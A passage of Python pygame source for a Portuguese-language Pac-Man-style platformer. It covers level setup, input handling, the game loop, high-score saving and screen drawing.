Fantasma1(2,2906,315,\"vertical\"),Fantasma1(0,5833,315,\"vertical\"),\r\n Fantasma1(2,6223,315,\"vertical\"),Fantasma1(1,3432,350,\"horizontal\")]\r\n\r\n self.macas = [Maca(758,260),Maca(3441,310),Maca(3820,260),Maca(4565,260),Maca(6950,260)]\r\n \r\n self.peras = [Pera(2251,320),Pera(3031,290),Pera(5218,318),Pera(5958,278)]\r\n \r\n self.pacman = Pacman(120, 120)\r\n\r\n self.passagem = Passagem(6647,333)\r\n\r\n self.chave = Chave(7320,275)\r\n\r\n self.destruicao_pacman = False\r\n\r\n def init_fase4(self):\r\n self.atualizar_tela = 0\r\n self.mundo = Mundo4()\r\n self.plataforma_movel = [Plataforma_movel(6565+100,400),Plataforma_movel(9377,422)]\r\n self.bolas = [Bola1(x,y) for x,y in ((1865,320),(1925,320),(3135,320),(3195,320),(6892,320),(6952,320),(7042,320),(7102,320),(7192,320),(7252,320),(7552,320),(7612,320))]\r\n\r\n for pos in (1473,2218,2393,2568,2743,3488,4143,4798,7695):\r\n self.bolas.extend([Bola1(pos+50*i,457) for i in range(3)])\r\n for pos in (1657,2017,2927,3287,3807,4462,5117,7337,7879,9916,10261):\r\n self.bolas.extend([Bola1(pos+60*i,387) for i in range(3)])\r\n \r\n\r\n self.fantasmas = [Fantasma1(1,575,380,\"horizontal\"),Fantasma1(0,842,344,\"horizontal\"),\r\n Fantasma1(2,1181,344,\"horizontal\"),\r\n Fantasma1(1,1725,368,\"horizontal\"),Fantasma1(0,2085,368,\"horizontal\"),Fantasma1(2,2365,437,\"horizontal\"),\r\n Fantasma1(1,2715,437,\"horizontal\"),Fantasma1(2,2995,368,\"horizontal\"),\r\n Fantasma1(1,3355,368,\"horizontal\"),\r\n Fantasma1(1,3875,368,\"horizontal\"),Fantasma1(0,4530,368,\"horizontal\"),Fantasma1(2,5185,368,\"horizontal\"),\r\n Fantasma1(0,7412,368,\"horizontal\"),Fantasma1(2,7947,368,\"horizontal\"),Fantasma1(1,9984,368,\"horizontal\"),\r\n Fantasma1(0,10329,368,\"horizontal\"),\r\n Fantasma1(0,7007,299,\"horizontal\"),\r\n Fantasma1(2,7157,300,\"horizontal\"),Fantasma1(1,7755,437,\"horizontal\"), \r\n Fantasma1(0,5965,391,\"horizontal\"),Fantasma1(0,6330,342,\"horizontal\"),\r\n Fantasma1(0,8272,332,\"vertical\"), Fantasma1(2,8537,367,\"vertical\"),\r\n Fantasma1(1,8802,332,\"vertical\")]\r\n\r\n self.macas = [Maca(300,200),Maca(1892,260),Maca(3163,260),Maca(6920,260),Maca(7070,260),Maca(7220,260),Maca(7580,260)]\r\n \r\n self.peras = [Pera(583,310),Pera(2531,337),Pera(5973,302),Pera(8545,337)]\r\n \r\n self.pacman = Pacman(120, 120)\r\n\r\n self.passagem = Passagem(9634,333)\r\n\r\n self.chave = Chave(10136,275)\r\n\r\n self.destruicao_pacman = False\r\n\r\n def init_fase5(self):\r\n self.atualizar_tela = 0\r\n self.mundo = Mundo5()\r\n self.plataforma_movel = [Plataforma_movel(7795,420),Plataforma_movel(13307,420)]\r\n self.bolas = [Bola1(x,y) for x,y in ((2875,320),(2935,320),\r\n (3620,320),(3680,320),\r\n (4365,320),(4425,320),\r\n (5110,320),(5170,320),\r\n (8032,320),(8092,320),\r\n (9162,320),(9222,320),\r\n (9907,320),(9967,320),\r\n (13554,320),(13614,320))]\r\n\r\n for pos in (1538,1853,2168,2483,3228,3973,4718,5473,9515):\r\n self.bolas.extend([Bola1(pos+50*i,457) for i in range(3)])\r\n for pos in (2667,3027,3412,3772,4157,4517,4902,5262,5787,6137,6487,6837,8184,8394,8604,8814,9314,9699):\r\n self.bolas.extend([Bola1(pos+60*i,387) for i in range(3)])\r\n \r\n self.fantasmas = [Fantasma1(2,515,380,\"horizontal\"), Fantasma1(1,1175,380,\"horizontal\"),Fantasma1(0,845,380,\"horizontal\"),\r\n Fantasma1(2,1598,437,\"horizontal\"),Fantasma1(1,1913,437,\"horizontal\"),Fantasma1(0,2228,437,\"horizontal\"),\r\n Fantasma1(1,3288,437,\"horizontal\"),Fantasma1(0,4033,437,\"horizontal\"),\r\n Fantasma1(2,4778,437,\"horizontal\"),Fantasma1(0,9575,437,\"horizontal\"),\r\n Fantasma1(2,2735,368,\"horizontal\"),Fantasma1(1,3095,368,\"horizontal\"),Fantasma1(0,3480,368,\"horizontal\"),\r\n Fantasma1(2,3840,368,\"horizontal\"),Fantasma1(1,4225,368,\"horizontal\"),Fantasma1(0,4585,368,\"horizontal\"),\r\n Fantasma1(2,4970,368,\"horizontal\"),Fantasma1(1,5330,368,\"horizontal\"),Fantasma1(0,5855,368,\"horizontal\"),\r\n Fantasma1(2,6205,368,\"horizontal\"),Fantasma1(1,6555,368,\"horizontal\"),Fantasma1(0,6905,368,\"horizontal\"),\r\n Fantasma1(2,8357,368,\"horizontal\"),Fantasma1(1,8777,368,\"horizontal\"),\r\n Fantasma1(1,9382,368,\"horizontal\"),Fantasma1(0,9767,368,\"horizontal\"),\r\n Fantasma1(2,12468,330,\"vertical\"), Fantasma1(1,12792,414,\"horizontal\"),Fantasma1(0,13125,330,\"vertical\"),\r\n Fantasma1(1,7372,351,\"horizontal\"),Fantasma1(2,10946,344,\"horizontal\")]\r\n \r\n self.fantasmas2 = [Fantasma2(850,325)]\r\n\r\n self.macas = [Maca(414,250),Maca(2903,260),Maca(3648,260),Maca(4393,260),Maca(5138,260),Maca(8060,260),Maca(9190,260),\r\n Maca(9935,260),Maca(13582,260)]\r\n \r\n self.peras = [Pera(7398,261),Pera(10946,280)]\r\n \r\n self.pacman = Pacman(120, 120)\r\n\r\n self.passagem = Passagem(14739,307)\r\n\r\n self.chave = Chave(14983,260)\r\n\r\n self.destruicao_pacman = False\r\n\r\n def init_desafio_final(self):\r\n self.mundo = Mundo_das_trevas()\r\n self.atualizar_tela = 0\r\n self.pacman = Pacman(120,120)\r\n\r\n self.plataforma_movel = []\r\n\r\n self.fantasmas = []\r\n\r\n self.fantasmas2 = []\r\n\r\n self.macas = []\r\n \r\n self.peras = []\r\n\r\n self.bolas = []\r\n\r\n self.passagem = Passagem(-55,0)\r\n\r\n self.chave = Chave(-55,0)\r\n self.destruicao_pacman = False\r\n\r\n self.evil_pacman = [Evil_pacman(800,409)]\r\n\r\n def teclado_e_mouse(self):\r\n for evento in pygame.event.get():\r\n if evento.type == QUIT:\r\n pygame.quit()\r\n sair()\r\n\r\n if evento.type == KEYDOWN:\r\n self.tecla_pulo = evento.key if evento.key == self.teclas[1] else 0\r\n if self.tecla_pulo == self.teclas[1]:\r\n if self.estado_jogo == 'JR':\r\n if self.tocar_som and not self.destruicao_pacman:\r\n toca_som(\"pulo.wav\")\r\n if self.estado_jogo == 'IN':\r\n if evento.key == K_RETURN:\r\n self.estado_jogo = 'MF'\r\n elif evento.key >= K_a and evento.key <= K_z:\r\n if len(self.nome_jogador) < 10:\r\n self.nome_jogador += chr(evento.key-32)\r\n elif evento.key == K_BACKSPACE:\r\n self.nome_jogador = self.nome_jogador[0:len(self.nome_jogador)-1]\r\n if self.estado_jogo == 'JR':\r\n if evento.key == self.teclas[0]:\r\n if not self.tiro_jogador and self.quant_tiros > 0 and not self.destruicao_pacman:\r\n self.tiro_jogador = Tiro(self.pacman.get_rect().x+self.pacman.get_rect().w/2-10,self.pacman.get_rect().y+10, self.pacman.direcao)\r\n self.quant_tiros -= 1\r\n if self.tocar_som:\r\n toca_som(\"tiro.wav\")\r\n elif self.estado_jogo == 'DP':\r\n if evento.key == K_BACKSPACE or evento.key == K_TAB:\r\n pygame.mixer.music.stop()\r\n self.sair = True\r\n if evento.key == K_ESCAPE:\r\n if self.estado_jogo == 'FDJ':\r\n self.sair = True\r\n if evento.key == K_RETURN:\r\n if self.estado_jogo == 'FDJ':\r\n self.__init__(self.fase if self.fase != 'DF' else 5)\r\n if self.fase == 1:\r\n self.init_fase1()\r\n elif self.fase == 2:\r\n self.init_fase2()\r\n elif self.fase == 3:\r\n self.init_fase3()\r\n elif self.fase == 4:\r\n self.init_fase4()\r\n elif self.fase == 5 or self.fase == 'DF':\r\n self.init_fase5()\r\n self.estado_jogo = 'MF'\r\n elif self.estado_jogo == 'MZ':\r\n self.estado_jogo = 'DP'\r\n \r\n \r\n if self.tecla_pulo and not self.acionou_pulo and self.estado_jogo == 'JR':\r\n self.acionou_pulo = True\r\n\r\n self.tecla = pygame.key.get_pressed()\r\n\r\n if self.tecla[self.teclas[3]] and self.estado_jogo == 'JR':\r\n if not self.destruicao_pacman:\r\n self.pacman.atualiza('L')\r\n colisao2 = [self.plataforma_movel[i].colisao('L', 3, self.pacman) for i in range(len(self.plataforma_movel))]\r\n if not self.atualizar_tela:\r\n if not self.mundo.colisao('L', 3, self.pacman) and not True in colisao2:\r\n self.pacman.move()\r\n else:\r\n if not self.mundo.colisao('L', 3, self.pacman) and not True in colisao2:\r\n self.mundo.atualiza(3)\r\n self.passagem.atualiza(3)\r\n self.chave.atualiza(3)\r\n for plat_movel in self.plataforma_movel:\r\n plat_movel.atualiza(3)\r\n for bola in self.bolas:\r\n bola.atualiza(3)\r\n for fantasma in self.fantasmas:\r\n fantasma.atualiza(3)\r\n for maca in self.macas:\r\n maca.atualiza(3)\r\n for pera in self.peras:\r\n pera.atualiza(3)\r\n if self.fase == 5:\r\n for fantasma in self.fantasmas2:\r\n fantasma.atualiza(3)\r\n\r\n elif self.tecla[self.teclas[2]] and self.estado_jogo == 'JR':\r\n if not self.destruicao_pacman:\r\n self.pacman.atualiza('R')\r\n colisao2 = [self.plataforma_movel[i].colisao('R', 3, self.pacman) for i in range(len(self.plataforma_movel))]\r\n if not self.atualizar_tela:\r\n if not self.mundo.colisao('R', 3, self.pacman) and not True in colisao2:\r\n self.pacman.move()\r\n if self.pacman.get_rect().x > 325 and self.fase != 'DF':\r\n self.atualizar_tela = 1\r\n else:\r\n if not self.mundo.colisao('R', 3, self.pacman) and not True in colisao2:\r\n self.mundo.atualiza(-3)\r\n self.passagem.atualiza(-3)\r\n self.chave.atualiza(-3)\r\n for plat_movel in self.plataforma_movel:\r\n plat_movel.atualiza(-3)\r\n for bola in self.bolas:\r\n bola.atualiza(-3)\r\n for fantasma in self.fantasmas:\r\n fantasma.atualiza(-3)\r\n for maca in self.macas:\r\n maca.atualiza(-3)\r\n for pera in self.peras:\r\n pera.atualiza(-3)\r\n if self.fase == 5:\r\n for fantasma in self.fantasmas2:\r\n fantasma.atualiza(-3)\r\n\r\n if self.acionou_pulo:\r\n colisao2 = [self.plataforma_movel[i].colisao('U', self.pacman.vel_pulo, self.pacman) for i in range(len(self.plataforma_movel))]\r\n colisao3 = [self.plataforma_movel[i].colisao('D', self.pacman.vel_pulo, self.pacman) for i in range(len(self.plataforma_movel))]\r\n if not self.mundo.colisao('U', self.pacman.vel_pulo, self.pacman) and not True in colisao2:\r\n self.pacman.pula()\r\n \r\n elif self.mundo.colisao('D', self.pacman.vel_pulo, self.pacman) or self.mundo.colisao('U', self.pacman.vel_pulo, self.pacman) or True in colisao2 or True in colisao3:\r\n self.acionou_pulo = False\r\n self.tecla_pulo = 0\r\n self.pacman.vel_pulo = 15\r\n\r\n def grava_recorde(self):\r\n try:\r\n arq = open('recordes.dat','r+')\r\n recordistas = []\r\n for linha in arq:\r\n linha = linha.strip()\r\n recordistas.append([linha.split(\"|\")[0],linha.split(\"|\")[1]])\r\n novo_recorde = False\r\n if self.pontuacao >= int(recordistas[0][1]):\r\n novo_recorde = True\r\n recordistas[3][0],recordistas[3][1] = recordistas[2][0],recordistas[2][1]\r\n recordistas[2][0],recordistas[2][1] = recordistas[1][0],recordistas[1][1]\r\n recordistas[1][0],recordistas[1][1] = recordistas[0][0],recordistas[0][1]\r\n recordistas[0][0],recordistas[0][1] = self.nome_jogador,str(self.pontuacao)\r\n elif self.pontuacao >= int(recordistas[1][1]):\r\n novo_recorde = True\r\n recordistas[3][0],recordistas[3][1] = recordistas[2][0],recordistas[2][1]\r\n recordistas[2][0],recordistas[2][1] = recordistas[1][0],recordistas[1][1]\r\n recordistas[1][0],recordistas[1][1] = self.nome_jogador, str(self.pontuacao)\r\n elif self.pontuacao >= int(recordistas[2][1]):\r\n novo_recorde = True\r\n recordistas[3][0],recordistas[3][1] = recordistas[2][0],recordistas[2][1]\r\n recordistas[2][0],recordistas[2][1] = self.nome_jogador, str(self.pontuacao)\r\n elif self.pontuacao >= int(recordistas[3][1]):\r\n novo_recorde = True\r\n recordistas[3][0],recordistas[3][1] = self.nome_jogador, str(self.pontuacao)\r\n\r\n arq.close()\r\n\r\n if novo_recorde:\r\n arq = open('recordes.dat','w')\r\n arq.writelines((recordistas[0][0]+\"|\"+recordistas[0][1]+\"\\n\",\r\n recordistas[1][0]+\"|\"+recordistas[1][1]+\"\\n\",\r\n recordistas[2][0]+\"|\"+recordistas[2][1]+\"\\n\",\r\n recordistas[3][0]+\"|\"+recordistas[3][1]+\"\\n\"))\r\n\r\n arq.close()\r\n except:\r\n arq = open('recordes.dat','w')\r\n arq.writelines((self.nome_jogador+\"|\"+str(self.pontuacao)+\"\\n\",\r\n \"**********|0\\n\",\r\n \"**********|0\\n\",\r\n \"**********|0\\n\"))\r\n\r\n arq.close()\r\n \r\n def atualiza(self):\r\n if self.estado_jogo == 'MF':\r\n self.tempo_nova_fase += 1\r\n if self.tempo_nova_fase > 100:\r\n self.estado_jogo = 'JR'\r\n self.tempo_nova_fase = 0\r\n if self.tocar_som:\r\n pygame.mixer.music.load(\"sons/flourish.mid\")\r\n pygame.mixer.music.play(-1)\r\n pygame.mixer.music.set_volume(.5)\r\n\r\n if self.estado_jogo == 'JR':\r\n if self.fase == 5:\r\n for fantasma in self.fantasmas2:\r\n fantasma.move()\r\n \r\n for fantasma in self.fantasmas:\r\n fantasma.move(self.mundo)\r\n \r\n if not self.mundo.colisao('D', 4, self.pacman) and not True in [self.plataforma_movel[i].colisao('D', self.pacman.vel_pulo, self.pacman) for i in range(len(self.plataforma_movel))]:\r\n if self.pacman.direcao != 'D':\r\n self.pacman.get_rect().move_ip(0,4)\r\n\r\n if self.fase != 'DF':\r\n if self.plataforma_movel[0].colisao('D', 5, self.pacman):\r\n self.plataforma_movel[0].move()\r\n self.pacman.get_rect().move_ip(0,-4)\r\n\r\n if self.fase > 1:\r\n if self.plataforma_movel[1].colisao('D', 5, self.pacman):\r\n self.plataforma_movel[1].move()\r\n self.pacman.get_rect().move_ip(0,-4)\r\n\r\n if self.pacman.captura_item(self.bolas):\r\n self.pontuacao += 5\r\n self.bolas_capturadas += 1\r\n if self.tocar_som:\r\n toca_som(\"crunch.aiff\")\r\n if self.pacman.captura_item(self.peras):\r\n self.pontuacao += 10\r\n if self.tocar_som:\r\n toca_som(\"pacman_eatfruit.wav\")\r\n for fantasma in self.fantasmas:\r\n fantasma.set_medo()\r\n if self.fase == 5:\r\n for fantasma in self.fantasmas2:\r\n fantasma.set_medo1()\r\n \r\n if self.pacman.captura_item(self.macas):\r\n if self.tocar_som:\r\n toca_som(\"pacman_eatfruit.wav\")\r\n self.quant_tiros += 2\r\n\r\n if self.tiro_jogador:\r\n self.tiro_jogador.move()\r\n\r\n if self.tiro_jogador:\r\n for rect in self.mundo.rects:\r\n if self.tiro_jogador.colide(rect):\r\n self.tiro_jogador = 0\r\n break\r\n\r\n if self.tiro_jogador:\r\n for fantasma in self.fantasmas:\r\n if self.tiro_jogador.colide(fantasma.rect) and not fantasma.medo:\r\n fantasma.set_medo()\r\n self.tiro_jogador = 0\r\n break\r\n\r\n for fantasma in self.fantasmas:\r\n if self.pacman.colide(fantasma.rect):\r\n if fantasma.medo:\r\n self.fantasmas.remove(fantasma)\r\n if self.tocar_som:\r\n toca_som(\"pacman_eatghost.wav\")\r\n self.pontuacao += 4\r\n else:\r\n self.destruicao_pacman = True\r\n\r\n\r\n if self.pacman.get_rect().top > 540:\r\n self.destruicao_pacman = True\r\n\r\n if self.destruicao_pacman:\r\n if self.pacman.destruicao():\r\n self.vidas_jogador -= 1\r\n self.tecla_pulo = 0\r\n self.acionou_pulo = False\r\n if self.fase == 1:\r\n pygame.mixer.music.stop()\r\n self.init_fase1()\r\n self.estado_jogo = 'MF'\r\n elif self.fase == 2:\r\n pygame.mixer.music.stop()\r\n self.init_fase2()\r\n self.estado_jogo = 'MF'\r\n elif self.fase == 3:\r\n pygame.mixer.music.stop()\r\n self.init_fase3()\r\n self.estado_jogo = 'MF'\r\n elif self.fase == 4:\r\n pygame.mixer.music.stop()\r\n self.init_fase4()\r\n self.estado_jogo = 'MF'\r\n elif self.fase == 5:\r\n pygame.mixer.music.stop()\r\n self.init_fase5()\r\n self.estado_jogo = 'MF'\r\n elif self.fase == 'DF':\r\n self.pacman = Pacman(120,120)\r\n self.destruicao_pacman = False\r\n\r\n for fantasma in self.fantasmas:\r\n fantasma.muda_estado()\r\n\r\n if self.pacman.colide(self.chave.rect):\r\n if self.tocar_som and not self.chave_capturada:\r\n toca_som(\"chave.ogg\")\r\n self.chave_capturada = True\r\n\r\n if self.chave_capturada:\r\n self.passagem.abre()\r\n\r\n if self.passagem.esta_aberta() and self.passagem.dentro(self.pacman.get_rect()):\r\n if self.fase != 5 :\r\n pygame.mixer.music.stop()\r\n if self.tocar_som:\r\n toca_som(\"pacman_intermission.wav\")\r\n pygame.time.wait(3000)\r\n if self.fase == 1:\r\n self.fase = 2\r\n self.chave_capturada = False\r\n self.vidas_jogador += 1\r\n self.init_fase2()\r\n self.estado_jogo = 'MF'\r\n elif self.fase == 2:\r\n self.fase = 3\r\n self.chave_capturada = False\r\n self.vidas_jogador += 1\r\n self.init_fase3()\r\n self.estado_jogo = 'MF'\r\n elif self.fase == 3:\r\n self.fase = 4\r\n self.chave_capturada = False\r\n self.vidas_jogador += 1\r\n self.init_fase4()\r\n self.estado_jogo = 'MF'\r\n elif self.fase == 4:\r\n self.fase = 5\r\n self.chave_capturada = False\r\n self.vidas_jogador += 1\r\n self.init_fase5()\r\n self.estado_jogo = 'MF'\r\n elif self.fase == 5:\r\n self.fase = 'DF'\r\n self.atualizar_tela = 0\r\n self.chave_capturada = False\r\n self.vidas_jogador += 3\r\n self.init_desafio_final()\r\n pygame.mixer.music.stop()\r\n #if self.tocar_som:\r\n #pygame.mixer.music.load(\"sons/missao_impossivel.mp3\")\r\n #pygame.mixer.music.play(-1)\r\n #pygame.mixer.music.set_volume(.75)\r\n\r\n if self.passagem.esta_aberta() and self.pacman.get_rect().colliderect(self.passagem.rect):\r\n if self.fase == 'DF':\r\n if self.tocar_som:\r\n toca_som(\"pacman_intermission.wav\")\r\n pygame.time.wait(5000)\r\n self.estado_jogo = 'ZR'\r\n self.atualizar_tela = 0\r\n self.mundo = Mundo_zeramento()\r\n self.pacwoman = Pacwoman(1125,280)\r\n #if self.tocar_som:\r\n #pygame.mixer.music.load(\"sons/pacman_abertura.mp3\")\r\n #pygame.mixer.music.play(-1)\r\n\r\n if self.fase == 5:\r\n if self.tiro_jogador:\r\n for fantasma in self.fantasmas2:\r\n if self.tiro_jogador.colide(fantasma.rect) and not fantasma.inativo1 and not fantasma.inativo2:\r\n fantasma.set_medo1()\r\n self.tiro_jogador = 0\r\n break\r\n \r\n for fantasma in self.fantasmas2:\r\n fantasma.muda_estado()\r\n\r\n for fantasma in self.fantasmas2:\r\n if self.pacman.colide(fantasma.rect):\r\n if fantasma.inativo1 and not fantasma.inativo2:\r\n if self.tocar_som:\r\n toca_som(\"pacman_eatghost.wav\")\r\n fantasma.set_medo2()\r\n self.pontuacao += 8\r\n elif not (fantasma.inativo2 and fantasma.inativo2):\r\n self.destruicao_pacman = True\r\n\r\n if self.pontuacao == 1332/2:\r\n self.pontuacao += 1\r\n\r\n if self.vidas_jogador == 0:\r\n self.estado_jogo = 'FDJ'\r\n self.guarda_fase = self.fase\r\n\r\n if self.fase == 'DF':\r\n if self.quant_tiros == 0 and len(self.macas) == 0:\r\n self.macas = [Maca(320,310)]\r\n if self.vidas_evil_pacman > 0 and len(self.evil_pacman) == 0:\r\n self.evil_pacman.append(Evil_pacman(800,409))\r\n for evil_pacman in self.evil_pacman:\r\n evil_pacman.move()\r\n evil_pacman.muda_estado()\r\n\r\n if not self.acionou_pulo_evil_pacman:\r\n if evil_pacman.get_rect().x > 320 and evil_pacman.get_rect().x < 325:\r\n self.acionou_pulo_evil_pacman = True\r\n\r\n if self.acionou_pulo_evil_pacman:\r\n evil_pacman.pula()\r\n if evil_pacman.get_rect().bottom > 450:\r\n self.acionou_pulo_evil_pacman = False\r\n evil_pacman.get_rect().bottom = 450\r\n evil_pacman.vel_pulo = 15\r\n\r\n if not self.tiro_evil_pacman and evil_pacman.atira():\r\n for evil_pacman in self.evil_pacman:\r\n self.tiro_evil_pacman = Evil_tiro(evil_pacman.get_rect().x+evil_pacman.get_rect().w/2-10,evil_pacman.get_rect().y+10, evil_pacman.direcao)\r\n\r\n if self.pacman.colide(evil_pacman.get_rect()) and not self.destruicao_pacman:\r\n if evil_pacman.medo:\r\n if self.tocar_som:\r\n toca_som(\"pacman_eatghost.wav\")\r\n self.evil_pacman.remove(evil_pacman)\r\n self.pontuacao += 25\r\n self.vidas_evil_pacman -= 1\r\n else:\r\n self.destruicao_pacman = True\r\n \r\n if self.tiro_evil_pacman:\r\n self.tiro_evil_pacman.move()\r\n\r\n if self.tiro_evil_pacman:\r\n if self.tiro_evil_pacman.destroi(self.pacman.get_rect()):\r\n self.destruicao_pacman = True\r\n\r\n if self.tiro_evil_pacman:\r\n if self.tiro_jogador:\r\n if self.tiro_evil_pacman.destroi(self.tiro_jogador.rect):\r\n self.tiro_evil_pacman = 0\r\n self.tiro_jogador = 0\r\n\r\n if self.tiro_evil_pacman:\r\n for rect in self.mundo.rects:\r\n if self.tiro_evil_pacman.colide(rect):\r\n self.tiro_evil_pacman = 0\r\n break\r\n\r\n if self.tiro_jogador:\r\n for evil_pacman in self.evil_pacman:\r\n if self.tiro_jogador.colide(evil_pacman.get_rect()) and not evil_pacman.medo:\r\n evil_pacman.set_medo()\r\n self.tiro_jogador = 0\r\n break\r\n\r\n if self.vidas_evil_pacman == 0:\r\n self.mundo.aparecer_plataformas()\r\n self.chave = Chave(461,285)\r\n self.passagem = Passagem(115,276)\r\n\r\n if self.pacman.colide(self.chave.rect):\r\n self.chave_capturada = True\r\n\r\n if self.chave_capturada:\r\n self.passagem.abre()\r\n\r\n if self.vidas_evil_pacman == 0 and self.vidas_jogador > 0:\r\n if not self.novo_recorde:\r\n pygame.mixer.music.stop()\r\n self.pontuacao += (self.vidas_jogador*100+self.bolas_capturadas)\r\n self.grava_recorde()\r\n self.novo_recorde = 1\r\n\r\n if self.estado_jogo == 'ZR':\r\n self.pacman.atualiza('R')\r\n if not self.atualizar_tela:\r\n self.pacman.move()\r\n\r\n if self.pacman.rect.x > 325:\r\n self.atualizar_tela = True\r\n\r\n if self.atualizar_tela:\r\n self.mundo.atualiza(-3)\r\n self.pacwoman.atualiza(-3)\r\n self.passagem.rect.move_ip(-3,0)\r\n\r\n if self.pacwoman.get_rect().x < 610:\r\n self.pacman.pula()\r\n if self.pacman.get_rect().bottom > 320:\r\n self.pacman.get_rect().bottom = 320\r\n if self.pacwoman.get_rect().x < 550:\r\n self.pacwoman.emociona()\r\n\r\n if self.pacman.get_rect().colliderect(self.pacwoman.get_rect()):\r\n pygame.time.wait(2000)\r\n pygame.mixer.music.stop()\r\n self.estado_jogo = 'MZ'\r\n #if self.tocar_som:\r\n #pygame.mixer.music.load(\"sons/pacman_ringtone_interlude.mp3\")\r\n #pygame.mixer.music.play(-1)\r\n \r\n\r\n def sair1(self):\r\n return self.sair\r\n \r\n def desenha(self, tela):\r\n self.mundo.desenha(tela)\r\n for bola in self.bolas:\r\n bola.desenha(tela)\r\n for maca in self.macas:\r\n maca.desenha(tela)\r\n for pera in self.peras:\r\n pera.desenha(tela)\r\n self.passagem.desenha(tela) if self.fase != 5 else self.passagem.desenha(tela,True)\r\n if self.tiro_jogador:\r\n self.tiro_jogador.desenha(tela)\r\n if not self.chave_capturada:\r\n self.chave.desenha(tela) if self.fase != 5 else self.chave.desenha(tela,True)\r\n if self.estado_jogo == 'JR' or self.estado_jogo == 'ZR' or self.estado_jogo == 'MZ':\r\n self.pacman.desenha(tela)\r\n for fantasma in self.fantasmas:\r\n fantasma.desenha(tela)\r\n if self.fase == 5:\r\n for fantasma in self.fantasmas2:\r\n fantasma.desenha(tela)\r\n for plat_movel in self.plataforma_movel:\r\n plat_movel.desenha(tela)\r\n \r\n if self.fase == 'DF':\r\n for evil_pacman in self.evil_pacman:\r\n evil_pacman.desenha(tela,self.vidas_evil_pacman)\r\n\r\n if self.tiro_evil_pacman:\r\n self.tiro_evil_pacman.desenha(tela)\r\n \r\n if self.estado_jogo == 'IN':\r\n tela.blit(pygame.transform.scale(background_menu,(655,555)),(0,0))\r\n tela.blit(background_submenu, (0,0))\r\n tela.blit(titulo_inserir_nome, (135,30))\r\n tela.blit(fonte[6].render(\"Digite seu nome (máximo 10 letras)\", True, (20,0,0)), [75,150])\r\n tela.blit(fonte[3].render(\"Jogador: \", True, (0,0,0)), [150,300])\r\n tela.blit(fonte[4].render(self.nome_jogador, True, (0,0,50)), [310,300])\r\n tela.blit(fonte[8].render(\"Tecle ENTER para começar o jogo.\", True, (0,0,20)), [110,460])\r\n\r\n self.pisca_barra += 1\r\n if self.pisca_barra > 10 and len(self.nome_jogador) == 0:\r\n pygame.draw.line(tela, (0,0,20), (310, 300), (310, 330), 3)\r\n self.pisca_barra = 0\r\n \r\n elif self.estado_jogo == 'MF':\r\n tela.blit(background_nova_fase,(0,0))\r\n tela.blit(fases[self.fase-1],(150,220))\r\n elif self.estado_jogo == 'ZR':\r\n self.pacwoman.desenha(tela)\r\n elif self.estado_jogo == 'MZ':\r\n self.pacwoman.desenha(tela)\r\n tela.blit(background_submenu, (0,0))\r\n tela.blit(titulo_parabens, (105,100))\r\n tela.blit(fonte[6].render(\"O Superpac encontrou a Pacwoman!!!\", True, (0,0,50)),(60,250))\r\n tela.blit(fonte[9].render(\"Pressione ENTER para continuar ...\", True, (0,0,0)),(140,400))\r\n elif self.estado_jogo == 'FDJ':\r\n tela.blit(background_fim_de_jogo,(0,0))\r\n tela.blit(fim_de_jogo,(80,150))\r\n tela.blit(fonte[3].render(\"Sua pontuação: \", True, (255,0,0)), [170,305])\r\n tela.blit(fonte[4].render(str(self.pontuacao), True, (255,255,0)), [435,305])\r\n tela.blit(fonte[0].render(\"Tecle ENTER para continuar ou ESC para sair.\", True, (255,255,255)), [95,465])\r\n elif self.estado_jogo == 'DP':\r\n tela.blit(pygame.transform.scale(background_menu,(655,555)),(0,0))\r\n tela.blit(background_submenu, (0,0))\r\n tela.blit(titulo_resultado_final, (105,30))\r\n tela.blit(fonte[6].render(\"Dados da partida jogada por\", True, (0,0,0)),(60-len(self.nome_jogador),150))\r\n tela.blit(fonte[6].render(self.nome_jogador, True, (50,0,0)),(460-len(self.nome_jogador),150))\r\n pygame.draw.rect(tela, (0,0,0), (30, 190, 590, 250), 1)\r\n tela.blit(fonte[7].render(\"Pontuação final:\", True, (0,0,0)),(50,220))\r\n tela.blit(fonte[6].render(str(self.pontuacao), True, (0,0,50)),(290,220))\r\n tela.blit(fonte[7].render(\"Vidas restantes:\", True, (0,0,0)),(50,270))\r\n tela.blit(fonte[6].render(str(self.vidas_jogador), True, (0,0,50)),(290,270))\r\n tela.blit(fonte[7].render(\"Bolas capturadas:\", True, (0,0,0)),(50,320))\r\n tela.blit(fonte[6].render(str(self.bolas_capturadas), True, (0,0,50)),(305,320))\r\n tela.blit(fonte[7].render(\"Bônus total:\", True, (0,0,0)),(50,370))\r\n tela.blit(fonte[6].render(str(self.vidas_jogador*100+self.bolas_capturadas), True, (0,0,50)),(235,370))\r\n tela.blit(fonte[1].render(\"BACKSPACE/TAB -> Voltar ao menu principal\", True, (0,20,0)), (110,470))\r\n else:\r\n tela.blit(municao_icone,[275,5])\r\n tela.blit(fonte[0].render(\"x\", True, (0,0,0) if self.fase < 4 else (255,255,255)), [300,4])\r\n tela.blit(fonte[1].render(str(self.quant_tiros), True, (0,0,0) if self.fase < 4 else (255,255,255)), [315,5])\r\n tela.blit(fonte[2].render(\"Pontos: \", True, (0,0,0) if self.fase < 4 else (255,255,255)), [5,5])\r\n tela.blit(fonte[1].render(str(self.pontuacao), True, (0,0,0) if self.fase < 4 else (255,255,255)), [85,5])\r\n tela.blit(fonte[2].render(\"Jogador:\", True, (0,0,0) if self.fase < 4 else (255,255,255)), [390,5])\r\n tela.blit(fonte[1].render(self.nome_jogador, True, (0,0,0) if self.fase < 4 else (255,255,255)), [480,5])\r\n tela.blit(vidas_icone,[160,6])\r\n tela.blit(fonte[0].render(\"x\", True, (0,0,0) if self.fase < 4 else (255,255,255)), [185,4])\r\n tela.blit(fonte[1].render(str(self.vidas_jogador), True, (0,0,0) if self.fase < 4 else (255,255,255)), [200,5])\r\n\r\n clock.tick(45)\r\n\r\n\r\nclass Menu():\r\n def __init__(self):\r\n self.estado = 'MP'\r\n self.teclas_config = [K_SPACE, K_UP, K_RIGHT, K_LEFT]\r\n self.pos_it = 1\r\n self.sair = False\r\n self.estado_botaoOK = 0\r\n\r\n self.pacmenu_ind = 0\r\n self.movimento_boca_pacmenu = 0\r\n\r\n self.escolha_teclas_movimentos = 1\r\n self.escolha_teclas_atirar = 1\r\n self.escolha_som = 1\r\n\r\n def init_musica(self):\r\n return\r\n #pygame.mixer.music.load(\"sons/pacman_abertura.mp3\")\r\n #pygame.mixer.music.play(-1)\r\n #pygame.mixer.music.set_volume(.75)\r\n #if self.escolha_som == 2:\r\n # pygame.mixer.music.pause()\r\n\r\n def 